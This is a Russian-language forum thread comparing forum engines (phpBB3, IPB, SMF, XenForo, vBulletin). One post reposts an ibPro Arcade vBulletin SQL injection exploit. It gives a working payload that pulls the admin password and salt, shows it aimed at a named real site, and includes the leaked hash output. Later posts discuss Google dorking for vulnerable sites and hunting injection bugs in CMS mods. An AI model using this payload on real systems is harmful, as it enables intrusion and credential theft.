Не могу найти полной информации по настройке.
Спасибо заранее!
phpbb3
Не могу найти полной информации по настройке.
Спасибо заранее!
Last edited by whiteshuk; 03-07-2012 at 07:37.
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Re: phpbb3
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
whiteshuk (05-07-2012)
Re: phpbb3
phpbb3 довольно сложный в плане настроек прав, сам запарился, а ещё довольно уязвимый, да и нагрузки большие он не держит, видел у китайцев довольно популярны phpwind и discuz, тянут очень нагруженные проекты на ура, из наших могу сказать что вобла 3.x довольна стабильна и безопасна, только с костылями. XenForo и Smf, тоже довольно лёгкие и шустро справляются с нагрузками, вот IPB мертвый слон...
Реверсинг ПО для незрячих - благородная цель
whiteshuk (05-07-2012)
Re: phpbb3
Не сложный, а много функциональный. Что соответственно требует немного больше времени для изучения.phpbb3 довольно сложный в плане настроек прав, сам запарился
Форум от создателей воблы (vbulletin 3.x). Внешне довольно симпатичный. Функционал не крутил.XenForo
Недавно смотрел, очень не понравился. В плане функциональности чувствуешь себя ущербным. Я бы охарактеризовал его "Огрызок", сугубо мое ИМХО.Smf
То что нет русской поддержки, совершенно не значит, что это мертвый форум. Очень хороший, постоянно развивающийся форум, с поддержкой полезных плюшек (правда за дополнительную плату).IPB мертвый слон
PS: Если бы я сейчас стоял перед выбором vBulletin или IPB, то наверное выбрал бы IPB.
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
Re: phpbb3
IPB из коробки даже тормозит на слабых машинах, сильно требователен к оперативе
база данных 130+ таблиц, ещё и языковые строки в ней хранится
раньше уважал IPB2 но с выходом 3йки понял что они оборзели, даже отключив совершенно все рюшечки открытие страниц на локалке 1-2 секунды,
по поводу smf он немного ограничен, создавался как "домашний форум", однако держит базы данных от 500 метров на ура!
phpbb по сравнению с тем же xenforo слишком уж редко обновляется и уже потерял свою популярность из-за застывшего девелопинга.
Last edited by V3T; 04-07-2012 at 11:10.
Реверсинг ПО для незрячих - благородная цель
Re: phpbb3
Для комфортного старта подойдут средние тарифы большинства хостеров. Затем, при повышении аудитории, можно переходить до максимального. Благо, хостинг сейчас дешевый.IPB из коробки даже тормозит на слабых машинах, сильно требователен к оперативе!
база данных 130+ таблиц, ещё и языковые строки в ней хранится!
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
Re: phpbb3
кстате вот событие по поводу воблы: Странно, что vbsupport на этот раз не сделали рассылки об уязвимости,
Уязвимость в хаке ibPro Arcade
[0-Day] ibPro Arcade vBulletin Exploit
Fetch the password & salt of user ID 1:Code:/arcade.php?act=Arcade&do=stats&comment=a&s_id=[SQLi]
proof:Code:/arcade.php?act=Arcade&do=stats&comment=a&s_id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,salt) FROM user WHERE id = 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Code:http://www.nohomers.net/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(password,0x3a,salt)%20FROM%20user%20WHERE%20id%20=%201),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)Code:mySQL error: Duplicate entry '7a4d3244d834397e38b65ef817e62cb4:Q:v)r!oe@KuF:L5@aA91^qyiaTOsC%1' for key 'group_key'
Те, у кого установлен данный хак - снесите, fix'a устраняющего уязвимость пока нет тема на vbulletin.org
http://www.vbulletin.org/forum/showthread.php?t=101554
Сейчас начался повальный взлом форумов, недавно был взломан bormotuhi.нет,
всего сайтов использующих этот хак приблизительно >400 000
https://www.google.ru/search?sugexp=...d+by+vBulletin
Гугл находит 233 000
Реверсинг ПО для незрячих - благородная цель
Re: phpbb3
А на каком движке этот уютный форум.Originally Posted by V3T
И как ты заставил гугал искать по движку?
п.с. откуда берешь уязвимости.
Неожидал такой бурной рубки, спасибо ребята.
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Re: phpbb3
whiteshuk: да мне ребята накидали тут интересных ресов, вот и нахожу:)
у гугла есть вообще много интересных правил поиска, вот немного: http://jbhelp.ru/topic/156-google-hacks/
Реверсинг ПО для незрячих - благородная цель
whiteshuk (05-07-2012)
Re: phpbb3
Ладно, надеюсь никто не обидется.
Я так понимаю это заплатка? http://forum.reverse4you.org/index.p...20group_concat
Раньше там была уязвимость, или как?
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Re: phpbb3
Никакой уязвимости там нет и не было. Это срабатывает небольшой фильтр.Ладно, надеюсь никто не обидется.
Я так понимаю это заплатка? http://forum.reverse4you.org/index.p...20group_concat
Раньше там была уязвимость, или как?
Успех – это путь от провала до провала без потери энтузиазма. (В. Черчиль)
Не бойся идти медленно, бойся остановиться. (Китайская пословица)
When you lose fun and start doing things only for the payback, you're dead. (c) TCLH (Phrack 65, Intro)
Re: phpbb3
А что такое фильтр в данном случае, как он работает?
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Re: phpbb3
простая проверка на get параметры, не думаю что тут какието самодельные костыли есть, все исправления уязвимостей есть в паблике...
думаю если и искать баги, то не в стандартных файлах воблы, она вся давно леченная перелеченная. вон блог поковыряй может чего и найдется...
хотя не знаю какая квалификация в сфере php у рута, может он маньяк вообще))
часто разрабы модов забывают добавлять банальные проверки на размер полей, а в мускуле если будет переполнение поля будет выдаваться ошибочка которую можно потом раскрутить...
Last edited by V3T; 05-07-2012 at 19:53.
Реверсинг ПО для незрячих - благородная цель
Re: phpbb3
Кого посоветуешь почитать по теме?
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Re: phpbb3
я не силён в построении инъекций... по форумам там до сям читаю...
Реверсинг ПО для незрячих - благородная цель
Re: phpbb3
Может попробуем тогда все это как-то систематизировать?
Linux version 2.6.32-40-generic (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #87-Ubuntu SMP Tue Mar 6 00:56:56 UTC 2012
Re: phpbb3
что значит систематизировать? - это и есть програмирование, изучай мускул, php, node, ruby
только знающий как это работает сможет найти ошибку в работе другого,
мой совет - ковыряй малоизвестные cms...
Реверсинг ПО для незрячих - благородная цель
Posting Permissions
|
All times are GMT. The time now is 01:34
vBulletin® Copyright ©2000 - 2018 www.reverse4you.org |
|
Reply With Quote
Thanks
